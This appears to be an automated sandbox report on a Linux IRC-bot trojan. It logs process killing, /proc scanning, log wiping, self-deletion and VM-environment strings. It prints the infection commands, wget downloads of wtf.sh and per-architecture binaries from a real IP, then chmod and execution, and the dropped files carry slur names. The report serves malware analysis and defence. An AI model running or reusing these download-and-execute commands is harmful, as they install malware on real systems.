Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 904, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 1877, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 6430, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 6440, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 6478, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 6485, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 6501, result: successfulJump to behavior
Source: /tmp/lol (PID: 6224)SIGKILL sent: pid: -6224, result: unknownJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 721, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 904, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 912, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 918, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 1601, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 1638, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 1877, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 6226, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 6231, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 6259, result: successfulJump to behavior
Source: /tmp/lol (PID: 6228)SIGKILL sent: pid: 6403, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 904, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 1877, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 6430, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 6440, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 6478, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 6485, result: successfulJump to behavior
Source: /tmp/retard (PID: 6421)SIGKILL sent: pid: 6501, result: successfulJump to behavior
Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Ircbot_bb204b81 reference_sample = 6147481d083c707dc98905a1286827a6e7009e08490e7d7c280ed5a6356527ad, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Ircbot, fingerprint = 66f9a8a31653a5e480f427d2d6a25b934c2c53752308eedb57eaa7b7cb7dde2e, id = bb204b81-db58-434f-b834-672cdc25e56c, last_modified = 2021-09-16
Source: /tmp/faggot (deleted), type: DROPPEDMatched rule: Linux_Trojan_Ircbot_bb204b81 reference_sample = 6147481d083c707dc98905a1286827a6e7009e08490e7d7c280ed5a6356527ad, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Ircbot, fingerprint = 66f9a8a31653a5e480f427d2d6a25b934c2c53752308eedb57eaa7b7cb7dde2e, id = bb204b81-db58-434f-b834-672cdc25e56c, last_modified = 2021-09-16
Source: classification engineClassification label: mal80.spre.evad.lin@0/12@1/0

Data Obfuscation

barindex
Manipulation of devices in /dev
Source: /tmp/retard (PID: 6419)Deleted: /dev/kmsgJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6472/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6472/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6471/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6471/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6474/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6474/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6473/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6473/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6476/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6476/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6475/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6475/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6478/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6470/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/6470/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/retard (PID: 6421)File opened: /proc/114/cmdlineJump to behavior
Source: /bin/sh (PID: 6221)Chmod executable: /usr/bin/chmod -> chmod +x lolJump to behavior
Source: /bin/sh (PID: 6256)Chmod executable: /usr/bin/chmod -> chmod +x lmaoJump to behavior
Source: /bin/sh (PID: 6399)Chmod executable: /usr/bin/chmod -> chmod +x faggotJump to behavior
Source: /bin/sh (PID: 6404)Chmod executable: /usr/bin/chmod -> chmod +x gayJump to behavior
Source: /bin/sh (PID: 6410)Chmod executable: /usr/bin/chmod -> chmod +x retardJump to behavior
Source: /bin/sh (PID: 6428)Chmod executable: /usr/bin/chmod -> chmod +x niggerJump to behavior
Source: /bin/sh (PID: 6433)Chmod executable: /usr/bin/chmod -> chmod +x shitJump to behavior
Source: /bin/sh (PID: 6438)Chmod executable: /usr/bin/chmod -> chmod +x niggaJump to behavior
Source: /bin/sh (PID: 6443)Chmod executable: /usr/bin/chmod -> chmod +x kekwJump to behavior
Source: /bin/sh (PID: 6458)Chmod executable: /usr/bin/chmod -> chmod +x whatJump to behavior
Source: /bin/sh (PID: 6481)Chmod executable: /usr/bin/chmod -> chmod +x kysJump to behavior
Source: /bin/sh (PID: 6499)Chmod executable: /usr/bin/chmod -> chmod +x shiteaterJump to behavior
Source: /bin/sh (PID: 6504)Chmod executable: /usr/bin/chmod -> chmod +x blyatJump to behavior
Source: /bin/sh (PID: 6506)Rm executable: /usr/bin/rm -> rm wtf.shJump to behavior
Source: /bin/sh (PID: 6218)Wget executable: /usr/bin/wget -> wget http://94.156.8.244/wtf.shJump to behavior
Source: /bin/sh (PID: 6220)Wget executable: /usr/bin/wget -> wget -O lol http://94.156.8.244/mipsJump to behavior
Source: /bin/sh (PID: 6233)Wget executable: /usr/bin/wget -> wget -O lmao http://94.156.8.244/mpslJump to behavior
Source: /bin/sh (PID: 6258)Wget executable: /usr/bin/wget -> wget -O faggot http://94.156.8.244/x86_64Jump to behavior
Source: /bin/sh (PID: 6403)Wget executable: /usr/bin/wget -> wget -O gay http://94.156.8.244/armJump to behavior
Source: /bin/sh (PID: 6409)Wget executable: /usr/bin/wget -> wget -O retard http://94.156.8.244/arm5Jump to behavior
Source: /bin/sh (PID: 6425)Wget executable: /usr/bin/wget -> wget -O nigger http://94.156.8.244/arm6Jump to behavior
Source: /bin/sh (PID: 6430)Wget executable: /usr/bin/wget -> wget -O shit http://94.156.8.244/arm7Jump to behavior
Source: /bin/sh (PID: 6435)Wget executable: /usr/bin/wget -> wget -O nigga http://94.156.8.244/i586Jump to behavior
Source: /bin/sh (PID: 6440)Wget executable: /usr/bin/wget -> wget -O kekw http://94.156.8.244/i686Jump to behavior
Source: /bin/sh (PID: 6447)Wget executable: /usr/bin/wget -> wget -O what http://94.156.8.244/powerpcJump to behavior
Source: /bin/sh (PID: 6478)Wget executable: /usr/bin/wget -> wget -O kys http://94.156.8.244/sh4Jump to behavior
Source: /bin/sh (PID: 6485)Wget executable: /usr/bin/wget -> wget -O shiteater http://94.156.8.244/m68kJump to behavior
Source: /bin/sh (PID: 6501)Wget executable: /usr/bin/wget -> wget -O blyat http://94.156.8.244/sparcJump to behavior
Source: /usr/bin/chmod (PID: 6221)File: /tmp/lol (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /usr/bin/chmod (PID: 6404)File: /tmp/gay (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /usr/bin/chmod (PID: 6410)File: /tmp/retard (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /usr/bin/wget (PID: 6220)File written: /tmp/lolJump to dropped file
Source: /usr/bin/wget (PID: 6233)File written: /tmp/lmao (deleted)Jump to dropped file
Source: /usr/bin/wget (PID: 6258)File written: /tmp/faggot (deleted)Jump to dropped file
Source: /usr/bin/wget (PID: 6403)File written: /tmp/gayJump to dropped file
Source: /usr/bin/wget (PID: 6409)File written: /tmp/retardJump to dropped file
Source: /usr/bin/wget (PID: 6425)File written: /tmp/nigger (deleted)Jump to dropped file
Source: /usr/bin/wget (PID: 6430)File written: /tmp/shit (deleted)Jump to dropped file
Source: /usr/bin/wget (PID: 6435)File written: /tmp/nigga (deleted)Jump to dropped file
Source: /usr/bin/wget (PID: 6447)File written: /tmp/what (deleted)Jump to dropped file
Source: /usr/bin/wget (PID: 6485)File written: /tmp/shiteater (deleted)Jump to dropped file
Source: /usr/bin/wget (PID: 6501)File written: /tmp/blyat (deleted)Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Deletes system log files
Source: /tmp/retard (PID: 6419)Log files deleted: /var/log/kern.logJump to behavior
Drops files in suspicious directories
Source: /usr/bin/wget (PID: 6218)File: /usr/bin/wtf.shJump to dropped file
Sample deletes itself
Source: /tmp/lol (PID: 6222)File: /tmp/lolJump to behavior
Source: /tmp/retard (PID: 6411)File: /tmp/retardJump to behavior
Source: lol.16.drDropped file: segment LOAD with 7.9242 entropy (max. 8.0)
Source: lmao (deleted).26.drDropped file: segment LOAD with 7.9285 entropy (max. 8.0)
Source: faggot (deleted).32.drDropped file: segment LOAD with 7.8949 entropy (max. 8.0)
Source: gay.47.drDropped file: segment LOAD with 7.9704 entropy (max. 8.0)
Source: retard.55.drDropped file: segment LOAD with 7.9567 entropy (max. 8.0)
Source: nigger (deleted).65.drDropped file: segment LOAD with 7.9656 entropy (max. 8.0)
Source: shit (deleted).71.drDropped file: segment LOAD with 7.9574 entropy (max. 8.0)
Source: nigga (deleted).77.drDropped file: segment LOAD with 7.8889 entropy (max. 8.0)
Source: what (deleted).89.drDropped file: segment LOAD with 7.9522 entropy (max. 8.0)
Source: /tmp/retard (PID: 6419)Truncated file: /var/log/syslogJump to behavior
Source: /tmp/retard (PID: 6419)Truncated file: /var/log/kern.logJump to behavior
Source: /tmp/retard (PID: 6419)Truncated file: /var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/system.journalJump to behavior
Source: /tmp/retard (PID: 6419)Truncated file: /var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/user-1000.journalJump to behavior
Source: /tmp/lol (PID: 6222)Queries kernel information via 'uname': Jump to behavior
Source: /tmp/gay (PID: 6405)Queries kernel information via 'uname': Jump to behavior
Source: /tmp/retard (PID: 6411)Queries kernel information via 'uname': Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6268)Queries kernel information via 'uname': Jump to behavior
Source: retard, 6586.1.000055720a30b000.000055720a558000.rw-.sdmpBinary or memory string: /arm/tmp/vmware-root_721-4290559889
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsdviceurnald
Source: retard, 6586.1.00007f1484031000.00007f1484041000.rw-.sdmpBinary or memory string: $/tmp/vmware-root_721-4290559889,
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmpBinary or memory string: !/var/lib/PackageKit!/var/lib/ucf/cache!/var/lib/vmware/VGAuthr1/var/lib/vmware/VGAuth/aliasStore!/var/lib/geoclue!/var/lib/vmware/arm/var1/var/cache/private/fwupdmgr/fwupd!/var/lib/lightdm-data!/var/lib/grub/esprm/varQ/var/lib/systemd/deb-systemd-helper-enabled/cloud-final.service.wantsar1/var/lib/update-notifier0!/var/lib/fwupd!/var/lib/boltd/arm/var1/var/cache/dictionaries-common0!/var/lib/fwupd/gnupg!/var/lib/grub/ucfrm/varQ
Source: sh, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6224.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6226.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6228.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6231.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6234.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6262.1.00007ffde835e000.00007ffde837f000.rw-.sdmpBinary or memory string: Wx86_64/usr/bin/qemu-mips./lol0daySUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/usr/binCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./lol
Source: sh, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6450.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6452.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6454.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6479.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6482.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6486.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6492.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6494.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6496.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6502.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6511.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6513.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6519.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6521.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6549.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6552.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmpBinary or memory string: $x86_64/usr/bin/qemu-arm./retard0daySUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./retard
Source: lol, 6262.1.00007f41f8468000.00007f41f846e000.rw-.sdmpBinary or memory string: vmware-root_721-4290559889c(59889c(
Source: lol, 6226.1.00005580be181000.00005580be1a8000.rw-.sdmpBinary or memory string: U1/tmp/vmware-root_721-42905598891/var/log/installer/block0
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips./lol0day8.244/wtf.sh; /bin/sh wtf.sh_spaw/0inux-gnu/xfce4/panel/plugins/libactions.so1412582925actionsAction ButtonsLog out, lock or other system actionson plugin for the Xfce panels and control the brightness of your displayT`
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
Source: retard, 6586.1.000055720a30b000.000055720a558000.rw-.sdmpBinary or memory string: rU1/var/lib/snapd/ssl/store-certspell!/var/lib/snapd/sequence1/tmp/vmware-root_721-4290559889!/dev/misc/watchdogQ/var/lib/app-info/icons/ubuntu-focal-updates-universe/64x641/var/lib/emacsen-common/state/package
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmpBinary or memory string: /var/lib/vmware
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmpBinary or memory string: @/var/lib/vmware/VGAuth/aliasStore
Source: retard, 6448.1.00007f1484041000.00007f1484047000.rw-.sdmpBinary or memory string: vmware-root_721-4290559889
Source: sh, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6224.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6226.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6228.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6231.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6234.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6262.1.00005580be0fa000.00005580be181000.rw-.sdmpBinary or memory string: U1!/etc/qemu-binfmt/mips
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: sh, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, gay, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: retard, 6448.1.00007f1484041000.00007f1484047000.rw-.sdmpBinary or memory string: vmware-root_721-4290559889ck59889ck
Source: sh, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmp, gay, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmpBinary or memory string: hXUTime!/etc/qemu-binfmt/arm
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmpBinary or memory string: /var/lib/vmware4/var/lib/PackageKit
Source: lol, 6262.1.00005580be0fa000.00005580be181000.rw-.sdmpBinary or memory string: U!/sbin/mount.vmhgfs
Source: retard, 6448.1.000055720a30b000.000055720a558000.rw-.sdmpBinary or memory string: /sbin/mount.vmhgfs
Source: lol, 6226.1.00007f41f8468000.00007f41f8474000.rw-.sdmpBinary or memory string: vmware
Source: lol, 6228.1.00007f41f8457000.00007f41f8468000.rw-.sdmpBinary or memory string: /proc/6411/exe/usr/bin/qemu-armystemd-hostnamednitorye4-notifyd-agent-1
Source: retard, 6448.1.000055720a30b000.000055720a558000.rw-.sdmpBinary or memory string: !/sbin/xfs_db!/sbin/gdiskrU/arm/sbi1/sbin/lvmpolld/arm/sbin/gdisk0!/sbin/getcap!/sbin/pptpsetup/arm/sbi1/sbin/select-default-ispell0!/sbin/pccardctl1/sbin/slattach/arm/bi10!/sbin/mount.vmhgfs!/sbin/isosize!/sbin/grpck
Source: sh, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6224.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6226.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6228.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6231.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6234.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6262.1.00005580be0fa000.00005580be181000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmpBinary or memory string: T/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f/tmpX/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj\/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj/tmp$/tmp/vmware-root_721-4290559889P/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i4/tmp/snap.lxd
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm./retard0day244/wtf.sh; /bin/sh wtf.sh_spaw/0inux-gnu/xfce4/panel/plugins/libactions.so1412582925actionsAction ButtonsLog out, lock or other system actionson plugin for the Xfce panels and control the brightness of your display
Source: sh, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6549.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6552.1.000055720a30b000.000055720a558000.rw-.sdmpBinary or memory string: rUTime!/etc/qemu-binfmt/arm
Source: retard, 6586.1.00007f1484031000.00007f1484041000.rw-.sdmpBinary or memory string: /tmp/vmware-root_721-4290559889
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmpBinary or memory string: (/var/lib/vmware/VGAuth/aliasStore
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManagerh/
